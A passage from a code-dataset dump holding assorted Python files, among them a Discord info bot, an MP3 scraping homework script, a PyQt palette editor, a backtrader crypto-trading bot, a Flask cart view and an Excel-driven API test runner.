query.count()\n","sub_path":"neutron/plugins/ml2/drivers/l2pop/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":8075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"335127369","text":"import discord\nfrom discord.ext import commands\nimport json\nimport asyncio\nimport typing\nfrom .db_checks import is_mod\nfrom .db_converters import SmartMember\n\n\nclass db_info(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n with open(\"src/data/information.json\", \"r\") as json_file:\n self.info_dict = json.load(json_file)\n\n def save_json_dict(self, dict):\n with open(\"src/data/information.json\", \"w\") as json_file:\n json.dump(dict, json_file)\n\n def lowercase_keys_get(self, dict, match):\n for key in dict.keys():\n if match.lower() in key.lower():\n return key\n @commands.command()\n async def info(self, ctx, topic : typing.Optional[str],*, subtopic : typing.Optional[str]):\n topickey = None\n subtopickey = None\n if topic:\n topickey = self.lowercase_keys_get(self.info_dict, topic)\n if topickey and subtopic:\n subtopickey = self.lowercase_keys_get(self.info_dict[topickey], subtopic)\n\n if topic and topickey and (not subtopic or not subtopickey):\n subtopics_list = []\n topicinfo = \"\"\n for st in self.info_dict[topickey].keys():\n if st.lower() != topickey.lower():\n subtopics_list.append(st)\n else:\n topicinfo = self.info_dict[topickey][st]\n if len(subtopics_list) > 0:\n subtopics_list.sort(key=str.lower)\n allinfo_str = topicinfo+\"\\n\\n**Subtopics**\\n\"+\"```\\n\"+\"\\n\".join(subtopics_list)+\"\\n```\"+f\"Use `~info {topic} ` to learn more about a subtopic.\"\n else:\n allinfo_str = topicinfo\n infoEmbed = discord.Embed(title=f\"`{topickey}`\", description =allinfo_str, color=0xffb6c1)\n usemessage = f\"Info was used for topic `{topickey}`\"\n elif topic and topickey and subtopic and subtopickey:\n infoEmbed = discord.Embed(title = f\"`{topickey} : {subtopickey}`\", description = self.info_dict[topickey][subtopickey], color=0xffb6c1)\n\n usemessage = f\"Info was used for {subtopickey} in {topic}\"\n\n else:\n\n topiclist = list(self.info_dict.keys())\n topiclist.sort(key=str.lower)\n topiclist_str = '```\\n'+'\\n'.join(topiclist)+'\\n```'+'Use `~info ` to see information and subtopics.'\n infoEmbed = discord.Embed(title = \"Topics\", description = topiclist_str, color=0xffb6c1)\n usemessage = \"Info was used.\"\n\n await ctx.send(embed=infoEmbed)\n testserver = self.bot.get_guild(622553382279708672)\n infotrackchannel = testserver.get_channel(713113119861375007)\n await infotrackchannel.send(usemessage)\n\n @commands.group()\n async def editinfo(self, ctx):\n if ctx.invoked_subcommand is None:\n await ctx.send('Improper editinfo command.')\n\n @editinfo.command()\n async def addtopic(self, ctx, topic : str):\n if topic in self.info_dict:\n await ctx.send(\"This topic was already added.\")\n else:\n self.info_dict[topic] = {}\n self.save_json_dict(self.info_dict)\n await ctx.send('Topic added.')\n\n @editinfo.command()\n async def removetopic(self, ctx, topic : str):\n\n if topic in self.info_dict:\n await ctx.send(f'Are you sure you want to delete `{topic}` from `info`?')\n def delete_response(m):\n return m.author == ctx.author and m.channel == ctx.channel and (m.content.lower() == \"yes\" or m.content.lower() == \"no\")\n try:\n response = await self.bot.wait_for('message', check = delete_response, timeout = 120.0)\n except asyncio.TimeoutError:\n await ctx.send('Response timed out.')\n else:\n if response.content.lower() == \"yes\":\n del self.info_dict[topic]\n self.save_json_dict(self.info_dict)\n await ctx.send(f'`{topic}` deleted.')\n else:\n await ctx.send(f'Deletion canceled')\n else:\n await ctx.send('This is not a topic in `info`.')\n\n @editinfo.command()\n async def addsubtopic(self, ctx, topic: str, subtopic : str):\n if topic in self.info_dict:\n if subtopic in self.info_dict[topic]:\n await ctx.send(f'**Warning: This subtopic already exists and this command will overwrite it.** \\n \\nInput the information for `{subtopic}` below or type `cancel` to leave this menu.')\n else:\n await ctx.send(f'Input the information for `{subtopic}` below or type `cancel` to leave this menu.')\n\n def info_response(m):\n return m.author == ctx.author and m.channel == ctx.channel\n try:\n response = await self.bot.wait_for('message', check = info_response, timeout = 120.0)\n except asyncio.TimeoutError:\n await ctx.send('Response timed out.')\n else:\n if response.content.lower() == \"cancel\":\n await ctx.send('Command canceled')\n else:\n self.info_dict[topic][subtopic] = response.content\n await ctx.send(f'`{subtopic}` has been added.')\n self.save_json_dict(self.info_dict)\n else:\n await ctx.send(\"This is not a topic in `info`.\")\n @editinfo.command()\n async def removesubtopic(self, ctx, topic : str, subtopic : str):\n if topic in self.info_dict:\n if subtopic in self.info_dict[topic]:\n await ctx.send(f'Are you sure you want to delete `{subtopic}`?')\n def delete_response(m):\n return m.author == ctx.author and m.channel == ctx.channel and (m.content.lower() == \"yes\" or m.content.lower() == \"no\")\n try:\n response = await self.bot.wait_for('message', check = delete_response, timeout = 120.0)\n except asyncio.TimeoutError:\n await ctx.send('Response timed out.')\n else:\n if response.content.lower() == \"yes\":\n del self.info_dict[topic][subtopic]\n self.save_json_dict(self.info_dict)\n await ctx.send(f'`{subtopic}` deleted from {topic}.')\n else:\n await ctx.send(f'Deletion canceled')\n else:\n await ctx.send(f'This is not a subtopic under `{topic}`.')\n else:\n await ctx.send('This is not a topic in `info`.')\n\n @commands.command()\n @is_mod()\n async def sendinfo(self, ctx, member : SmartMember, topic : str,*, subtopic : typing.Optional[str]):\n topickey = None\n subtopickey = None\n if topic:\n topickey = self.lowercase_keys_get(self.info_dict, topic)\n if topickey and subtopic:\n subtopickey = self.lowercase_keys_get(self.info_dict[topickey], subtopic)\n\n if topic and topickey and (not subtopic or not subtopickey):\n subtopics_list = []\n topicinfo = \"\"\n for st in self.info_dict[topickey].keys():\n if st.lower() != topickey.lower():\n subtopics_list.append(st)\n else:\n topicinfo = self.info_dict[topickey][st]\n if len(subtopics_list) > 0:\n allinfo_str = topicinfo+\"\\n\\n**Subtopics**\\n\"+\"```\\n\"+\"\\n\".join(subtopics_list)+\"\\n```\"+\"Use `~info ` to learn more about a subtopic.\"\n else:\n allinfo_str = topicinfo\n infoEmbed = discord.Embed(title=topic, description =allinfo_str, color=0xffb6c1)\n if topickey == \"Reporting\":\n infoEmbed.set_image(url=\"https://i.imgur.com/6OD4GWr.png\")\n await member.send(embed=infoEmbed)\n await ctx.send(f'Sent info about `{topickey}` to {member}')\n\n elif topic and topickey and subtopic and subtopickey:\n infoEmbed = discord.Embed(title = f\"`{subtopic}` in `{topic}`\", description = self.info_dict[topickey][subtopickey], color=0xffb6c1)\n await member.send(embed=infoEmbed)\n await ctx.send(f'Sent info about `{subtopickey}` in `{topickey}` to {member}')\n\n else:\n await ctx.send('Topic not found.')\n\n async def cog_command_error(self, ctx, error):\n print(error)\n await ctx.send(f'Error: {error}')\n","sub_path":"src/db_modules/db_info.py","file_name":"db_info.py","file_ext":"py","file_size_in_byte":8552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"71674621","text":"# -*- encoding: utf-8 -*-\n'''\n@File : 03_wegt.py\n@Time : 2020/04/29 15:12:17\n@Author : xdbcb8 \n@Version : 1.0\n@Contact : xdbcb8@qq.com\n@WebSite : www.xdbcb8.com\n'''\n\n# here put the import lib\n\n# 给定一个网址(包含了优质的英语学习音频文件),http://www.listeningexpress.com/studioclassroom/ad/; 请大家写一个爬虫,将里面的英语节目MP3,都下载下来;\n# 这些音频文件 在网页的html文件内容都是以mp3结尾的,如下图所示:\n\n# 要求大家使用Requests库获取这个网页html文本内容,并且使用正则表达式获取里面所有的mp3文件的网址;并进行下载;\n# Windows上的wget可以点击这里 下载。 这个程序不用安装,直接在命令行里使用即可;\n# 注意:\n# 获取的音频网址前面需要加上 前缀 http://www.listeningexpress.com/studioclassroom/ad/ 才是完整的下载地址\n# MP3文件中有空格字符,组成下载网址时,需要进行url编码,否则空格会被当成命令行分隔符。参考代码如下所示\n# >>> from urllib.parse import quote\n# >>> quote('2019-04-13 NEWSworthy Clips.mp3')\n# '2019-04-13%20NEWSworthy%20Clips.mp3'\n\n'''\n题目是错的,有sc-ad, 不能url编码\n'''\n\nimport re\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nimport lxml\nfrom urllib.parse import quote\nimport wget\n\ntry:\n os.chdir(r'pythonhomework\\homework7')\nexcept FileNotFoundError as identifier:\n print(identifier)\n\n\nwith open('wget.txt', 'w', encoding = 'utf-8') as f:\n url = r'http://www.listeningexpress.com/studioclassroom/ad/'\n html = requests.get(url).text\n f.write(html)\n\ntext = []\nwith open('wget.txt', 'r', encoding = 'utf-8') as f:\n #不能用beautifulsoup筛选,因为留下的文本是网页上显示的,不是所需要的连接\n # html = f.read()\n # bs_get = BeautifulSoup(html, 'lxml')\n # text = bs_get.find_all(text = True)\n text = f.readlines()\n # for t in text:\n # print(t)\n\n\n#html文本处理,文本清洗\n# print('-------------------------------------------------------------------')\n# text = set(text)\n# print(text)\nretext = r'sc-ad.*\\.mp3'\nanoretext = r'sc-ad.{20,40}\\.mp3'\nrelist = []\n\n# for t in text:\n# pipei = re.search(retext, t)\n# if pipei:\n# relist.append(\"http://www.listeningexpress.com/studioclassroom/ad/\" + quote(pipei.group()[5 : ])) #url编码,合并网址\n#网址存在问题因此要重新修改正则匹配\nfor t in text:\n pipei = re.search(retext, t)\n if pipei:\n relist.append(pipei.group())\n# print(relist)\n#清洗文本\nrelist = re.findall(anoretext, relist[0])\nfor i,k in enumerate(relist):\n relist[i] = \"http://www.listeningexpress.com/studioclassroom/ad/\" + k #sc-ad 也是不要的\n print(relist[i])\n\ntry:\n os.chdir(r'.\\mp3download')\nexcept FileNotFoundError as identifier:\n print(identifier)\n\nfor t in relist:\n wget.download(t)\n","sub_path":"homework7/03_wegt.py","file_name":"03_wegt.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"407170462","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n'''\n Time Complexity: O(n * logn) where n is the number of nodes in the linked list. We find the middle of the linked list which takes logn time then create a TreeNode \n for every node in the linked list which takes n time.\n \n'''\nclass Solution:\n def sortedListToBST(self, head: Optional[ListNode]) -> Optional[TreeNode]:\n if not head:\n return\n elif not head.next:\n return TreeNode(head.val)\n\n slow, fast, prev = head, head, None\n \n while(fast != None and fast.next != None):\n fast = fast.next.next\n prev = slow\n slow = slow.next\n\n node = TreeNode(slow.val)\n prev.next = None\n \n node.left = self.sortedListToBST(head)\n node.right = self.sortedListToBST(slow.next)\n \n return node\n","sub_path":"Convert Sorted list to Binary Search Tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"255478753","text":"from PyQt5.QtWidgets import QColorDialog, QPushButton, QWidget, QHBoxLayout, QRadioButton, \\\r\n QLabel, QListWidget, QButtonGroup, QListWidgetItem, QUndoCommand\r\nfrom PyQt5.QtCore import Qt, pyqtSignal\r\nfrom PyQt5.QtGui import QColor, QPixmap\r\n\r\nclass ColorDisplay(QPushButton):\r\n colorChanged = pyqtSignal(int, QColor)\r\n\r\n def __init__(self, idx, window):\r\n super(ColorDisplay, self).__init__(window)\r\n self.window = window\r\n self.idx = idx\r\n self._color = None\r\n\r\n self.setMinimumHeight(16)\r\n self.setMaximumHeight(16)\r\n self.setMinimumWidth(16)\r\n self.setMaximumWidth(16)\r\n self.resize(16, 16)\r\n self.pressed.connect(self.onColorPicker)\r\n\r\n def set_color(self, color, create=False):\r\n if create:\r\n self.change_color(color)\r\n else:\r\n palette_list = self.window.window.window\r\n command = CommandColorChange(\r\n palette_list, self.window.window.idx, self.idx, color, \r\n \"%d: Changing Color from %s to %s\" % (self.idx, self._color, color))\r\n self.window.main_editor.undo_stack.push(command)\r\n\r\n def change_color(self, color):\r\n if color != self._color:\r\n self._color = color\r\n self.colorChanged.emit(self.idx, QColor(color))\r\n\r\n if self._color:\r\n self.setStyleSheet(\"background-color: %s;\" % self._color)\r\n else:\r\n self.setStyleSheet(\"\")\r\n\r\n def color(self):\r\n return self._color\r\n\r\n def onColorPicker(self):\r\n dlg = QColorDialog()\r\n if self._color:\r\n dlg.setCurrentColor(QColor(self._color))\r\n if dlg.exec_():\r\n self.set_color(dlg.currentColor().name())\r\n\r\n def mousePressEvent(self, e):\r\n if e.button() == Qt.RightButton:\r\n self.set_color(QColor(\"black\").name())\r\n\r\n return super(ColorDisplay, self).mousePressEvent(e)\r\n\r\nclass PaletteDisplay(QWidget):\r\n def __init__(self, colors, window):\r\n super(PaletteDisplay, self).__init__(window)\r\n self.window = window\r\n self.main_editor = self.window.window.window\r\n\r\n self.color_display_list = []\r\n\r\n self.layout = QHBoxLayout()\r\n self.layout.setSpacing(0)\r\n self.layout.setMargin(0)\r\n self.layout.setContentsMargins(0, 0, 0, 0)\r\n self.setLayout(self.layout)\r\n\r\n for idx, color in enumerate(colors):\r\n color_display = ColorDisplay(idx, self)\r\n color_display.set_color(color.name(), create=True)\r\n color_display.colorChanged.connect(self.on_color_change)\r\n self.layout.addWidget(color_display, 0, Qt.AlignCenter)\r\n self.color_display_list.append(color_display)\r\n\r\n def set_color(self, idx, color):\r\n self.color_display_list[idx].set_color(color.name())\r\n\r\n def on_color_change(self, idx, color):\r\n self.main_editor.update_view()\r\n\r\nclass PaletteFrame(QWidget):\r\n def __init__(self, idx, image_filename=None, image_map=None, window=None):\r\n super(PaletteFrame, self).__init__(window)\r\n self.window = window\r\n\r\n self.idx = idx\r\n if image_filename and image_map:\r\n self.name = image_filename[:-4].split('-')[-1]\r\n palette = self.get_palette_from_image(image_filename, image_map)\r\n\r\n self.create_widgets(palette)\r\n\r\n def create_widgets(self, palette):\r\n layout = QHBoxLayout()\r\n self.setLayout(layout)\r\n\r\n radio_button = QRadioButton()\r\n self.window.radio_button_group.addButton(radio_button, self.idx)\r\n radio_button.clicked.connect(lambda: self.window.set_current_palette(self.idx))\r\n self.name_label = QLabel(self.name)\r\n copy = QPushButton(\"Duplicate\")\r\n copy.clicked.connect(lambda: self.window.duplicate(self.idx))\r\n self.palette_display = PaletteDisplay(palette, self)\r\n layout.addWidget(radio_button)\r\n layout.addWidget(self.name_label)\r\n layout.addWidget(self.palette_display)\r\n layout.addWidget(copy)\r\n\r\n def get_colors(self):\r\n return [color_display.color() for color_display in self.palette_display.color_display_list]\r\n\r\n def set_name(self, name):\r\n self.name = name\r\n self.name_label.setText(name)\r\n\r\n def get_color_display(self, idx):\r\n return self.palette_display.color_display_list[idx]\r\n\r\n def get_color(self, idx):\r\n return self.palette_display.color_display_list[idx].color()\r\n\r\n def set_color(self, idx, color):\r\n self.palette_display.set_color(idx, color)\r\n\r\n def get_palette_from_image(self, fn, image_map):\r\n colors = []\r\n pixmap = QPixmap(fn)\r\n image = pixmap.toImage()\r\n colors = [QColor(\"black\")] * 16\r\n for x in range(image.width()):\r\n for y in range(image.height()):\r\n grid_index = image_map.get(x, y)\r\n color = QColor(image.pixel(x, y))\r\n while grid_index > len(colors) - 1:\r\n colors.append(QColor(\"black\")) # Sometimes more than 16 colors\r\n # if color != colors[grid_index]:\r\n # print(grid_index, colors[grid_index].getRgb(), color.getRgb())\r\n colors[grid_index] = color\r\n # Make sure there are always at least 16 colors\r\n # print(len(colors))\r\n # colors.extend([QColor(\"black\")] * (16 - len(colors)))\r\n\r\n return colors\r\n\r\n @classmethod\r\n def from_palette(cls, new_idx, palette_frame, window):\r\n p = cls(new_idx, None, None, window)\r\n p.name = palette_frame.name\r\n color_list = [QColor(c) for c in palette_frame.get_colors()]\r\n p.create_widgets(color_list)\r\n return p\r\n\r\nclass PaletteList(QListWidget):\r\n def __init__(self, window=None):\r\n super(PaletteList, self).__init__(window)\r\n self.window = window\r\n self.uniformItemSizes = True\r\n\r\n self.list = []\r\n self.current_index = 0\r\n self.radio_button_group = QButtonGroup()\r\n\r\n def add_palette_from_image(self, image_filename, image_map):\r\n print(image_filename)\r\n item = QListWidgetItem(self)\r\n self.addItem(item)\r\n pf = PaletteFrame(len(self.list), image_filename, image_map, self)\r\n self.list.append(pf)\r\n item.setSizeHint(pf.minimumSizeHint())\r\n self.setItemWidget(item, pf)\r\n # Try and make it the right size\r\n self.setMinimumWidth(self.sizeHintForColumn(0))\r\n return pf\r\n\r\n def remove_last_palette(self):\r\n print('Removing last palette!')\r\n self.takeItem(len(self.list) - 1)\r\n self.list.pop()\r\n\r\n def duplicate(self, idx):\r\n command = CommandDuplicate(self, idx, \"Duplicate Palette %d\" % idx)\r\n self.window.undo_stack.push(command)\r\n\r\n def set_current_palette(self, idx):\r\n self.current_index = idx\r\n self.radio_button_group.button(idx).setChecked(True)\r\n self.window.palette_text.setText(self.get_current_palette().name)\r\n self.window.update_view()\r\n\r\n def get_current_palette(self):\r\n return self.list[self.current_index]\r\n\r\n def get_last_palette(self):\r\n return self.list[-1]\r\n\r\n def get_palette(self, idx):\r\n return self.list[idx]\r\n\r\n def clear(self):\r\n print('PaletteList clear')\r\n # Need to remove things in reverse order, duh\r\n for idx, l in reversed(list(enumerate(self.list))):\r\n print(idx)\r\n self.takeItem(idx)\r\n l.deleteLater()\r\n self.list = []\r\n self.current_index = 0\r\n\r\nclass CommandDuplicate(QUndoCommand):\r\n def __init__(self, palette_list, idx, description):\r\n super(CommandDuplicate, self).__init__(description)\r\n self.palette_list = palette_list\r\n self.old_idx = palette_list.current_index\r\n self.idx = idx\r\n\r\n def redo(self):\r\n new_idx = len(self.palette_list.list)\r\n item = QListWidgetItem(self.palette_list)\r\n self.palette_list.addItem(item)\r\n new_pf = PaletteFrame.from_palette(new_idx, self.palette_list.list[self.idx], self.palette_list)\r\n self.palette_list.list.append(new_pf)\r\n item.setSizeHint(new_pf.minimumSizeHint())\r\n self.palette_list.setItemWidget(item, new_pf)\r\n\r\n def undo(self):\r\n # Delete last item\r\n self.palette_list.takeItem(self.palette_list.count() - 1)\r\n self.palette_list.list.pop()\r\n self.palette_list.set_current_palette(self.old_idx)\r\n\r\nclass CommandColorChange(QUndoCommand):\r\n def __init__(self, palette_list, palette_idx, color_idx, new_color, description):\r\n super(CommandColorChange, self).__init__(description)\r\n self.palette_list = palette_list\r\n self.palette_idx = palette_idx\r\n self.color_idx = color_idx\r\n self.old_color = self.palette_list.get_palette(palette_idx).get_color(color_idx)\r\n self.new_color = new_color\r\n\r\n def change_color(self, color):\r\n color_display = self.palette_list.get_palette(self.palette_idx).get_color_display(self.color_idx)\r\n color_display.change_color(color)\r\n\r\n def redo(self):\r\n self.change_color(self.new_color)\r\n\r\n def undo(self):\r\n self.change_color(self.old_color)\r\n","sub_path":"Utilities/Production/palette_editor_code/PaletteList.py","file_name":"PaletteList.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"188135744","text":"#!/usr/bin/env python3\n\nimport time\nimport backtrader as bt\nimport datetime as dt\n\nfrom ccxtbt import CCXTStore\nfrom config import BINANCE, ENV, PRODUCTION, COIN_TARGET, COIN_REFER, DEBUG\n\nfrom dataset.dataset import CustomDataset,OneTokenDataset\nfrom sizer.percent import FullMoney\nfrom strategies.random import BasicRandom\nfrom utils import print_trade_analysis, print_sqn, send_telegram_message\nimport os\n\ndef main():\n cerebro = bt.Cerebro(quicknotify=True)\n\n if ENV == PRODUCTION: # Live trading with Binance\n broker_config = {\n 'apiKey': os.environ.get('okex_key'),\n 'secret': os.environ.get('okex__secret'),\n 'nonce': lambda: str( int( time.time() * 1000 ) ),\n 'enableRateLimit': True,\n }\n\n store = CCXTStore( exchange='okex', currency='USDT', config=broker_config, retries=5, debug=DEBUG )\n\n broker_mapping = {\n 'order_types': {\n bt.Order.Market: 'market',\n bt.Order.Limit: 'limit',\n bt.Order.Stop: 'stop-loss',\n bt.Order.StopLimit: 'stop limit'\n },\n 'mappings': {\n 'closed_order': {\n 'key': 'status',\n 'value': 'closed'\n },\n 'canceled_order': {\n 'key': 'status',\n 'value': 'canceled'\n }\n }\n }\n\n okex = store.getbroker(broker_mapping=broker_mapping)\n print( okex.getcash(),okex.getvalue() )\n\n #cerebro.setbroker(okex)\n\n broker = cerebro.getbroker()\n broker.setcommission( commission=0.001, name=COIN_TARGET )\n broker.setcash( 100000.0 )\n cerebro.addsizer( FullMoney )\n\n initial_value = cerebro.broker.getvalue()\n print( 'Starting Portfolio Value: %.2f' % initial_value )\n\n\n\n hist_start_date = dt.datetime.utcnow() - dt.timedelta(minutes=30000)\n data = store.getdata(\n dataname='%s/%s' % (COIN_TARGET, COIN_REFER),\n name='%s%s' % (COIN_TARGET, COIN_REFER),\n timeframe=bt.TimeFrame.Minutes,\n #fromdate=hist_start_date,\n fromdate=dt.datetime( 2018, 1, 1 ),\n todate=dt.datetime( 2018, 12, 31 ),\n compression=15,\n ohlcv_limit=None\n )\n\n # Add the feed\n #cerebro.adddata(data)\n cerebro.resampledata( data, timeframe=bt.TimeFrame.Minutes, compression=30 )\n\n else: # Backtesting with CSV file\n data = OneTokenDataset(\n name='btc',\n dataname=\"dataset/candles_okef_btc.usd.t_2018-11-11_2018-12-12_5m.csv\",\n timeframe=bt.TimeFrame.Minutes,\n #fromdate=dt.datetime(2018, 11, 11,11,11),\n #todate=dt.datetime(2018, 11, 10,11,11),\n compression = 5,\n nullvalue=0.0,\n dtformat = 1,\n )\n\n cerebro.adddata(data)\n #cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=5)\n\n broker = cerebro.getbroker()\n broker.setcommission(commission=0.001, name=COIN_TARGET)\n broker.setcash(10000.0)\n cerebro.addsizer(FullMoney)\n\n # Analyzers to evaluate trades and strategies\n # SQN = Average( profit / risk ) / StdDev( profit / risk ) x SquareRoot( number of trades )\n cerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name=\"ta\")\n cerebro.addanalyzer(bt.analyzers.SQN, _name=\"sqn\")\n\n # Include Strategy\n cerebro.addstrategy(BasicRandom)\n\n # Print analyzers - results\n initial_value = cerebro.broker.getvalue()\n print('Starting Portfolio Value: %.2f' % initial_value)\n\n #exit()\n result = cerebro.run()\n final_value = cerebro.broker.getvalue()\n print('Final Portfolio Value: %.2f' % final_value)\n print('Profit %.3f%%' % ((final_value - initial_value) / initial_value * 100))\n\n #exit()\n print_trade_analysis(result[0].analyzers.ta.get_analysis())\n print_sqn(result[0].analyzers.sqn.get_analysis())\n\n if True: #DEBUG:\n cerebro.plot()\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print(\"finished.\")\n time = dt.datetime.now().strftime(\"%d-%m-%y %H:%M\")\n #send_telegram_message(\"Bot finished by user at %s\" % time)\n except Exception as err:\n send_telegram_message(\"Bot finished with error: %s\" % err)\n print(\"Finished with error: \", err)\n raise\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"623140039","text":"from flask import Blueprint, request, render_template, redirect, url_for\nfrom app.order.models import (\n get_active_order,\n get_order_items,\n update_quantity_order,\n delete_item_order\n)\nfrom app.products.models import get_order_products\nfrom flask_login import login_required, current_user\n\norder = Blueprint(\"order\", __name__, url_prefix=\"\")\n\n\n@order.route('/shop_cart', methods=['GET', 'POST'])\n@login_required\ndef show_shop_cart():\n '''\n method GET = Obtiene los productos de una orden y los pasa al template\n para ser mostrados, obtiene tambien el costo de la orden y la cantidad\n de productos\n methos POST = Actualiza la cantidad de articulos del carrito\n '''\n\n # obtener es estado de la orden (activa)\n active_order = get_active_order(current_user)\n # Si es activa obtiene los items que componene la orden()\n\n if active_order:\n order_items = get_order_items(active_order)\n if order_items:\n order_products = get_order_products(order_items)\n else:\n order_products = None\n order_items = None\n else:\n order_products = None\n order_items = None\n\n if request.method == \"GET\":\n\n # Poner estas variables como vacias (no como None) y poder usar zip()\n if order_products is None or order_items is None:\n order_products = []\n order_items = []\n # Unir las consultas\n products = zip(order_items, order_products)\n # Costos para modulo de pago\n prices = []\n descriptions = []\n total = 0\n for item in order_items:\n prices.append(item)\n total += item.order_item_price\n for product in order_products:\n descriptions.append(product)\n values = products\n\n iva = total*0.19\n\n my_info = {\"products\": products, \"values\": values, \"total\": total,\n \"iva\": iva}\n\n if request.method == \"POST\":\n order_item_id = int(request.form.get(\"order_item_id\"))\n action = request.form.get(\"action\")\n\n if action == \"update\":\n quantity = int(request.form.get(\"quantity\"))\n update_quantity_order(order_item_id, quantity)\n\n elif action == \"erase\":\n delete_item_order(order_item_id)\n\n return redirect(url_for('order.show_shop_cart'))\n\n return render_template('shop_cart.html', my_info=my_info)\n","sub_path":"Seminario de Ing Soft/Proyecto/Codigo/app/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"228192842","text":"# -*- coding: utf-8 -*-\n__author__ = 'jaundice'\n# 第二天模仿了一下,又写的一遍\n\ndef longestPalindrome(s):\n plain=[[False]*len(s) for ll in range(len(s))]\n count=1\n start=0\n end=0\n for i in range(0,len(s)):\n for j in range(0,i):\n if s[i]==s[j] and (i-j<=2 or plain[j+1][i-1]):\n plain[j][i]=True\n if i-j>count:\n count=i-j\n start=j\n end=i\n return s[start:end+1]\n\ns=\"12321sdf\"\nprint(longestPalindrome(s))\n","sub_path":"回文数.py","file_name":"回文数.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347005513","text":"# --*-- encoding:utf-8 --*--\nimport os\nimport requests\nimport subprocess\nimport to_html\nfrom log import logging\nfrom datetime import date\n\ntry:\n from openpyxl import load_workbook\n from lxml import etree\nexcept ImportError as e:\n subprocess.call(\"pip install openpyxl\", shell=True)\n subprocess.call(\"pip install lxml\", shell=True)\n from openpyxl import load_workbook\n from lxml import etree\n\n\ndef check_version(response):\n check_version = None\n # print(response.content)\n if \"text/html\" in response.headers['Content-Type']:\n page = etree.HTML((response.content.decode(\"utf-8\")).lower())\n\n infos = page.xpath(\"//h3\")\n\n for info in infos:\n # 原则上均能获取到版本号\n if \"version:\" in info.text:\n check_version = info.text\n elif \"application/json\" in response.headers['Content-Type']:\n check_version = eval(str(response.content, encoding=\"utf-8\"))['version']\n\n # print(check_version)\n\n return check_version\n\n\ndef history_data_append(wb):\n \"\"\"\n 当前针对Excel表的固定单元格进行填写,要求Excel表格数据格式与模板保持一致\n :param wb:\n :return:\n \"\"\"\n # wb = load_workbook(\"./testcase/前海API测试用例.xlsx\", data_only=True)\n sheet = wb['Analysis']\n # max_row 为当前表格最大行号\n row_num = sheet.max_row + 1\n\n # A7~H7分别代表版本号、当前版本case总数,当前版本整体通过率、当前版本high优先级case通过率\n # Issue总数、High优先级issue总数、Medium优先级issue总数 、low优先级issue总数\n logging.info(\"开始追加历史版本数据\")\n sheet[\"A%d\" % row_num].value = sheet[\"A7\"].value\n sheet[\"B%d\" % row_num].value = sheet[\"B7\"].value\n sheet[\"C%d\" % row_num].value = sheet[\"C7\"].value\n sheet[\"D%d\" % row_num].value = sheet[\"D7\"].value\n sheet[\"E%d\" % row_num].value = sheet[\"E7\"].value\n sheet[\"F%d\" % row_num].value = sheet[\"F7\"].value\n sheet[\"G%d\" % row_num].value = sheet[\"G7\"].value\n sheet[\"H%d\" % row_num].value = sheet[\"H7\"].value\n\n logging.info(\"历史版本数据追加完成\")\n\n # wb.save(\"./testcase/\" + case)\n\n # print(sheet[\"A7\"].value)\n\n\ndef api_test():\n try:\n cases = os.listdir(\"./testcase/\")\n for case in cases:\n # 表格中行数,调用api_test()时从第i行开始读取数据\n i = 3\n wb = load_workbook(\"./testcase/\" + case, data_only=True)\n sheet = wb[\"TestCase\"]\n checked_version = check_version(requests.get(sheet[\"G2\"].value))\n if checked_version != sheet[\"M2\"].value:\n logging.info(\"checked %s update and the %s is Testing\" % (checked_version, case))\n while sheet[\"B%d\" % i].value is not None:\n try:\n url = sheet[\"G%d\" % i].value\n params = sheet[\"H%d\" % i].value.encode('utf-8')\n headers = {'Content-Type': 'application/json'}\n\n # 确认请求类型\n if sheet[\"F%d\" % i].value == \"Post\":\n response = requests.post(url, data=params, headers=headers)\n elif sheet[\"F%d\" % i].value == \"Get\":\n response = requests.get(url, data=params, headers=headers)\n elif sheet[\"F%d\" % i].value == \"Put\":\n response = requests.put(url, data=params, headers=headers)\n elif sheet[\"F%d\" % i].value == \"Update\":\n response = requests.update(url, data=params, headers=headers)\n elif sheet[\"F%d\" % i].value == \"Delete\":\n response = requests.delete(url, data=params, headers=headers)\n else:\n logging.error(\n case + \" \" + sheet[\"A%d\" % i].value + \" request method \" + sheet[\"F%d\" % i].value +\n \" not support, please contact the admin\")\n continue\n\n # 将返回的状态码写入测试结果\n sheet[\"K%d\" % i] = response.status_code\n # 判断返回的状态码与预期是否一致,不一致则直接fail,一致则进一步判断返回值是否包含相应的关键字\n if response.status_code == sheet[\"I%d\" % i].value:\n if sheet[\"J%d\" % i].value in response.content.decode(\"utf-8\"):\n sheet[\"L%d\" % i] = \"Pass\"\n sheet[\"M%d\" % i] = response.content.decode(\"utf-8\")\n logging.info(case + \" \" + sheet[\"A%d\" % i].value + response.content.decode(\"utf-8\"))\n else:\n sheet[\"L%d\" % i] = \"Fail\"\n sheet[\"M%d\" % i] = response.content.decode(\"utf-8\")\n logging.error(\n case + \" \" + sheet[\"A%d\" % i].value + response.content.decode(\"utf-8\"))\n else:\n sheet[\"L%d\" % i] = 